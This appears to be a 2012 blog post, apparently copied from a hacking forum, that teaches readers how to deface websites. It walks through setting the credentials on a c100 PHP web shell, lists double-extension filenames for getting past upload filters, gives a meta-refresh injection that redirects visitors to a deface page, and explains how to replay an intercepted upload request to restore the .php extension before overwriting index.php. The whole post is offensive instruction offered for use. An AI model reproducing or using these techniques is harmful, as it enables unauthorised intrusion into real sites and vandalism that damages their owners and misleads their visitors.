Friday, August 10, 2012

2:36 AM
1

Here I will show you how to deface a website



First of all you will need shell. I will give you modified c100 shell which I use and it is undetectable.

Download Link: Shell here

First when you download c100.php you will need to edit it with notepad. And set your Username and Password, so that only one who know user/pw can access shell and website.

[Image: shelasd.jpg]

Thee green part, Username and passowrd edit as you like. But the md5 pass must be crypted. For that you go to
Crypo.com - Here you will make your pas MD5
Image has been scaled down 10% (870x542). Click this bar to view original image (960x598). Click image to open in new window.
[Image: md5pw.jpg]

So on crypo.com you write the password you writed in c100.php in my case it is hakforums and for that I get this MD5 password, copy it and paste in our shell c100.php
Code:
20e1f7d5481da19bf736569eb047e20c

So in my case c100 should look like this


Code:
$login = "Hacking-tool"; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = "hakforums"; //password
$md5_pass = "b54f268a2badf26e2499631f37d7b12e"; //md5-cryped pass. if null, md5($pass)

When you do that, save it and now find on website place where you can upload some file. Sometimes the website will block .php extension so you will have to bypass it. First open your shell with notepad and then Save As and change the extension to one of these
Code:
shell.php;.jpg
c100.php.jpg
c100.php..jpg
c100.php.jpg
c100.php.jpg:;
c100.php.jpg%;
c100.php.jpg;
c100.php.jpg;
c100.php.jpg:;


If website doesn't have any place where you can upload files, but have place where you can add news or new event or something you can use meta http-equiv to make redirection from website to your deface page. You do that by adding this code in news
Code:
<meta http-equiv="refresh" content="0;url=http://link_to_your_defacee_page">

Once you find admin panel upload your shell, if you can't upload .php directly upload it with modified extensions as I stated above.

[Image: neasd.jpg]

After you uploaded it find the link where you uploaded it, example if you uploaded it in images then it will be in site/images/c100.php After you enter the link the new Pop up windows will apear and it will ask you for login. Here you write your username and password your wrote in c100.php. After that you should get in website.


Sometimes simply extension hiding will not work so you will have to use one addon for firefox Live HTTP Headers Install it and then hide shell extension, go to the upload section. Open Live HTTP Headers and upload shell. Now if you try to go to the link where you have your shell uploaded it will give you error (only on some websites) so we will have to change that hided .php.jpg extension into the .php. So as we uploaded the shell and opened the Live HTTP Headers you should find where you have uploaded your shell. You will have to find the line where ti writes that you uploaded the shell. Select it and then click on button reply.


[Image: 124124g.jpg]

After that you will have to find once again the same line of code which shows that you have uploaded shell. So when you find it select the extension you used to hide original .php. In my case it is .jpg (List of all these extension is given in this tutorial at the beginning). When you select it delete it so that we have only c100.php. And after that once again click on reply.

[Image: 12412412414.png]

It should take you to the shell screen and if it doesn't you will have to find manually where shell has been uploaded and go to that link. Niote: This doesn't work for every website but work for a lot. Now you are in website.

[Image: unlednzl.jpg]

Find main index.php and edit it with your deface page source code, and click save. Thats it

Happy defacing

1 comments: